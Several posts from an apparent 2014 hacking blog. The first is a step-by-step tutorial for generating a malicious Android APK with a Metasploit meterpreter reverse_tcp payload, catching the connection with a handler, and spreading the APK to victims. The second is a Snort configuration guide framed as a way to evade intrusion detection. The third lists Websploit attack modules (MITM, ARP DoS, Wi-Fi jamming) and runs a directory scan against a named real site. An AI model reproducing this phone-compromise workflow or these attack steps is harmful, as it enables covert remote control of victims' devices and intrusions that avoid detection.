Monday, 19 May 2014

Hacking Android Smartphone Tutorial ( Easy Way )

Mobile users are increasing day by day, and the security threats grow together with them. Today's tutorial is how to hack an Android smartphone using Metasploit. Why an Android phone? Simply because Android has been growing very fast worldwide; here in China you can get an Android phone for only US$30, which is one of the reasons it is spreading so quickly.
What is Android? According to Wikipedia:

Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.
And what is an APK? According to Wikipedia:

Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.
Here is some initial information for this tutorial:
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443

Requirements:

1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)

2. Android smartphone (we use an HTC One running Android 4.4 KitKat)


Step by Step Hacking Android Smartphone Tutorial using Metasploit:

1. Open a terminal (CTRL + ALT + T); see the tutorial on how to create a Linux keyboard shortcut.
2. We will use msfpayload from the Metasploit Framework to generate the malicious APK. The R switch outputs the raw payload, which for android/meterpreter/reverse_tcp is a complete APK, so redirect it to a file:
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> R > <output_file>.apk
As described above, the attacker IP address is 192.168.8.94; below is our screenshot of the command being executed.

[Screenshot: output of the msfpayload command]

3. Because our payload is reverse_tcp, the victim connects back to the attacker's machine, so the attacker needs to set up a handler to receive incoming connections on the port specified above. Type msfconsole to open the Metasploit console.

[Screenshot: msfconsole with exploit/multi/handler selected and the payload set]

Info:
use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same as in step 2

4. Next we need to configure the options of the payload we selected in step 3.

[Screenshot: lhost and lport set, handler listening]

Info:
set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen on for the reverse connection
exploit –> start listening for incoming connections
5. The attacker now has the APK file and starts distributing it (I don't need to describe how to distribute this file; the internet is a good place for distribution :-) ). Note that on Android 4.4 the victim must have "Unknown sources" enabled to install an APK from outside Google Play, and the installer shows the permissions the app requests before it is installed.

6. Short story: the victim (myself) downloads the malicious APK and installs it. Once the victim opens the application, the attacker's Metasploit console shows something like this:

[Screenshot: Meterpreter session opened on the handler]

7. This means the attacker now has a Meterpreter session on the victim's Android smartphone and can run Meterpreter commands against the phone.

[Screenshot: Meterpreter commands run on the Android device]

Thursday, 15 May 2014

Evade A Network Intrusion Detection System (NIDS) Using Snort.

Welcome back, my fledgling hackers!

Nearly every commercial enterprise worth hacking has an intrusion detection system (IDS). These network intrusion detection systems are designed to detect malicious activity on the network. That means you!
As the name implies, a network intrusion detection system (NIDS) is intended to alert the system administrator to network-based intrusions. As hackers, the better we understand how these NIDS work, the better we can evade them and stealthily enter and exit a network without detection. To train you to evade these systems, I am beginning a new series on how NIDS work.


Introducing Snort: Our NIDS of Choice

Snort is an open-source NIDS and the most widely used NIDS in the world. Some estimate its market share at over 60%. It's used by such large organizations as Verizon, AT&T, the U.S. State Department, most U.S. military bases, and millions of medium to large businesses around the globe. Last month (July 2013), Cisco announced that it would be acquiring the parent company of Snort, Sourcefire Inc. of Columbia, MD. This ensures that Snort will remain the dominant NIDS on the planet for some time to come, making it increasingly important that we understand Snort, so we can evade it.
Fortunately, Snort is built into BackTrack, so we don't need to install it. If you do need to download it, you can find it at snort.org.

Step 1: Fire Up Snort

Snort is basically a network traffic sniffer that can apply rules to the traffic it sees to determine whether it contains malicious traffic. We can start Snort in sniffer mode by opening any terminal in BackTrack and typing the following, where -v is verbose, -d dumps the application-layer data and -e shows the link-layer headers:
  • snort -vde
After we hit enter, we begin to see packets going past the screen in rapid succession. Snort is simply sniffing packets from the wire and displaying them to us.
To stop Snort, hit Control-C. When Snort stops, it displays statistics on the packet capture.

Step 2: Intrusion Detection Mode

To get Snort to operate in intrusion detection (IDS) mode, we need to get Snort to use its configuration file. Nearly all applications in Linux are controlled by a configuration file that is a simple text file. The same applies to Snort. Snort's configuration file is named snort.conf and is usually found at /etc/snort/snort.conf. So, to get Snort to use its configuration file, we need to start it with:
  • snort -vde -c /etc/snort/snort.conf
Where -c says use the configuration file, and /etc/snort/snort.conf is the location of the configuration file.
When Snort starts in IDS mode, we see a screen similar to the one below. Eventually the screen stops scrolling and Snort begins watching your network traffic.
Now Snort is sniffing our wire and will alert when something malicious appears!

Step 3: Configuring Snort

Snort comes with a default configuration file that, for the most part, will work with little editing. The configuration has plenty of comments to explain what each line and section does, so you can figure it out with little outside assistance.
There are at least three areas, though, that need some attention and configuring:
  1. The EXTERNAL_NET variable
  2. The HOME_NET variable
  3. The path to the Snort rules
Without the Snort rules, Snort is just a sniffer/packet logger, far from the powerful IDS it can be. That being said, let's get inside that Snort configuration file and make the minimum changes to get Snort to run as an effective IDS.
Let's open the snort configuration file with KWrite.
  • kwrite /etc/snort/snort.conf
As you can see in the screenshot above, the configuration file is comprised of six (6) sections.
  1. Set the variables on your network
  2. Configure dynamic loaded libraries
  3. Configure preprocessors
  4. Configure output plugins
  5. Add any runtime config directives
  6. Customize your rule set
We need to first set the variables for our internal and external network. These are defined by the lines:
  • var HOME_NET
  • var EXTERNAL_NET
We can define HOME_NET as the IP address or subnet we're trying to protect. You see in the screenshot that it's set to "any." This will work, but it's not optimal for detecting malicious activity: many rules are written as $EXTERNAL_NET -> $HOME_NET, and with both variables set to "any" the direction carries no meaning. We should set HOME_NET to our internal IP address, such as 192.168.1.1 (which protects only that host), or to our internal subnet, such as 192.168.1.0/24.
In most cases, security admins define EXTERNAL_NET as everything that is NOT their HOME_NET. To accomplish this, we simply negate HOME_NET with "!", i.e. var EXTERNAL_NET !$HOME_NET.
Next, we need to set our path to our rules. As we can see in the screenshot below, about two-thirds of the way down, there is:
  • var RULE_PATH /etc/snort/rules
In most installations this path will be correct (it does vary between installations) and we can simply leave it as is, but make certain that your rules are actually in this path before assuming so. When you are done, simply save the snort.conf file.
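As an added example (not code from the original article), the shell script below writes a minimal snort.conf with the three settings discussed in this step, adds one local rule under RULE_PATH, reads the values back, and refuses a configuration that still has HOME_NET set to "any". It uses ipvar for the two network variables, which is the form Snort 2.9's shipped snort.conf uses for IP lists (var, as in the screenshot, is the form for builds without IPv6 support). The directory /tmp/snort-demo, the rule's message text and SID, and the eth0 interface passed to snort -T are assumptions for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original article): build a minimal snort.conf
# with the three settings the article says need attention, add one local
# rule, read the values back and reject a config that still protects "any".
# /tmp/snort-demo, the rule text and the eth0 interface are assumptions.

# Print a minimal Snort configuration. HOME_NET is what we protect and
# EXTERNAL_NET is its negation, "!$HOME_NET" (the backslashes keep the
# literal $ inside the heredoc). ipvar is the form Snort 2.9's snort.conf uses.
write_snort_conf() {
    home_net=$1
    rule_path=$2
    cat <<EOF
# Step 1: set the variables on your network
ipvar HOME_NET $home_net
ipvar EXTERNAL_NET !\$HOME_NET
var RULE_PATH $rule_path
# Step 6: customize your rule set (only our local rules in this example)
include \$RULE_PATH/local.rules
EOF
}

# One rule that exercises both variables: ICMP from outside to a protected
# host. SIDs of 1000000 and above are reserved for local rules.
write_test_rule() {
    cat <<'EOF'
alert icmp $EXTERNAL_NET any -> $HOME_NET any (msg:"ICMP from outside HOME_NET"; sid:1000001; rev:1;)
EOF
}

# Read the value of a "var NAME value" or "ipvar NAME value" line.
conf_var() {
    awk -v name="$2" '($1 == "var" || $1 == "ipvar") && $2 == name { print $3 }' "$1"
}

# Return 1 when HOME_NET is missing or still "any": with HOME_NET and
# EXTERNAL_NET both "any", a $EXTERNAL_NET -> $HOME_NET rule matches
# traffic in every direction and the alerts lose their meaning.
check_home_net() {
    val=$(conf_var "$1" HOME_NET)
    if [ -z "$val" ] || [ "$val" = "any" ]; then
        echo "HOME_NET is '$val'; set it to the address or subnet you protect" >&2
        return 1
    fi
    return 0
}

# Usage: write the files, check them, then let Snort parse the result
# (-T tests the configuration and exits without sniffing).
main() {
    dir=${1:-/tmp/snort-demo}
    mkdir -p "$dir/rules"
    write_snort_conf 192.168.1.0/24 "$dir/rules" > "$dir/snort.conf"
    write_test_rule > "$dir/rules/local.rules"
    check_home_net "$dir/snort.conf" || exit 1
    echo "HOME_NET=$(conf_var "$dir/snort.conf" HOME_NET)"
    snort -T -c "$dir/snort.conf" -i eth0
}

if [ "${1:-}" = "--run" ]; then main "$2"; fi
```

Run it with `sh snort_conf.sh --run` and then ping a host in HOME_NET from outside it; with `snort -c /tmp/snort-demo/snort.conf -A console -i eth0` the test rule should fire, which confirms the two variables are set the way you expect before you rely on the full rule set.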

Step 4: Checking the Snort Rules

We can navigate to the rules directory by typing these two commands:
  • cd /etc/snort/rules
  • ls -l
In this way, we can see all of the files that comprise our Snort rules. It's these Snort rules that are designed to catch intrusions and alert the security admin.
In my next tutorial in this series, we will examine these rules and how they work to catch intrusions. The better we understand these Snort rules, the better we are able to evade them!

Saturday, 3 May 2014

WEBSPLOIT TUTORIAL MITM ATTACK ::: KALI LINUX



Websploit is an automatic vulnerability assessment, web crawler and exploitation tool. It is an open-source command-line utility built on a modular structure. At the time of writing, 16 modules are available in Websploit; it can be downloaded from its SourceForge project page, and it is available on Kali Linux by default.

Websploit can be synchronized with the Metasploit WMAP project for web vulnerability scanning. There are four categories of modules:


  • Web Modules
  • Network Modules
  • Exploit Modules
  • Wireless Modules


In the wireless modules we can run some interesting Wi-Fi attack vectors, including a Wi-Fi jammer and a Wi-Fi DDoS attack. For exploitation, Websploit builds on Metasploit's autopwn and browser autopwn services. A large number of interesting attack vectors are available in the network modules, including but not limited to:

  • ARP cache DOS attack
  • Middle Finger Of Doom Attack
  • Man In The Middle Attack
  • Man Left In The Middle Attack
  • Fake Update Attack Using DNS Spoof
  • And more....

Some Websploit modules depend on Metasploit, for example:

  • Information Gathering From Victim Web Using (Metasploit Wmap)

so it is recommended to configure Metasploit before using these modules. Demonstrating every module is not possible in a single article, but the basic commands and usage given below will help you use Websploit effectively.

If you are on Kali Linux, click Applications → Kali Linux → Web Applications → Web Vulnerability Scanners → Websploit.

The commands available in Websploit are:



Command          Description
---------------  ----------------------------------------------
set              Set value of options for the current module
scan             Scan Wi-Fi (wireless modules)
stop             Stop attack & scan (wireless modules)
run              Execute module
use              Select module for use
os               Run Linux commands (ex: os ifconfig)
back             Exit current module
show modules     Show modules of the current database
show options     Show current options of the selected module
upgrade          Get new version
update           Update Websploit framework



In the demonstration below, the web directory scanner module (web/dir_scanner) is run against a target:





wsf > show modules
..
..
wsf > use web/dir_scanner
wsf:Dir_Scanner > show options

Options    Value
---------  --------------
TARGET     http://google.com

wsf:Dir_Scanner > set TARGET http://ehacking.net
TARGET => ehacking.net
wsf:Dir_Scanner > run
[*] Your Target : ehacking.net
[*] Loading Path List ... Please Wait ...
[index] ... [404 Not Found]
[images] ... [404 Not Found]
[download] ... [404 Not Found]
..
..
..


The commands for the other attack vectors are the same; just follow the steps above.
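What the web/dir_scanner module does, as an added example written in plain shell rather than Websploit's own code: for each candidate path it sends one HEAD request to the target and reports the HTTP status in the same "[path] ... [status]" form as the transcript above. The wordlist is constructed for the demonstration, the 5-second timeout and the labels for the non-404 codes are our own choices, and the target URL is only a usage placeholder. The codes other than 404 are the ones worth following up: a 403 means the path exists but is forbidden, and a 301/302 is usually a directory requested without its trailing slash.

```shell
#!/bin/sh
# Added example (not from the original article, not Websploit's code):
# a minimal directory scanner in the style of web/dir_scanner.
# Wordlist, timeout and status labels are our own assumptions.

# Map an HTTP status code to the label printed in the report.
# curl reports 000 when no HTTP response was received at all.
status_label() {
    case "$1" in
        200)     echo "200 OK" ;;
        301|302) echo "$1 Redirect" ;;
        401|403) echo "$1 Exists (access denied)" ;;
        404)     echo "404 Not Found" ;;
        000)     echo "connection failed" ;;
        *)       echo "$1 Other" ;;
    esac
}

# Join base URL and path without producing a double slash.
join_url() {
    printf '%s/%s\n' "${1%/}" "${2#/}"
}

# One HEAD request per path (-I), 5 s timeout, only the status code on
# stdout. Some servers answer HEAD with 405; those show up as "405 Other"
# and should be retried with GET.
probe() {
    curl -s -o /dev/null -m 5 -w '%{http_code}' -I "$1"
}

# Scan every non-empty line of the wordlist against the target.
scan_dirs() {
    target=$1
    wordlist=$2
    echo "[*] Your Target : $target"
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        code=$(probe "$(join_url "$target" "$path")")
        echo "[$path] ... [$(status_label "$code")]"
    done < "$wordlist"
}

# Usage: sh dirscan.sh http://target.example
# Builds a tiny constructed wordlist; a real run would use a full path list.
main() {
    list=$(mktemp)
    printf '%s\n' index images download admin backup .git > "$list"
    scan_dirs "$1" "$list"
    rm -f "$list"
}

if [ -n "${1:-}" ]; then main "$1"; fi
```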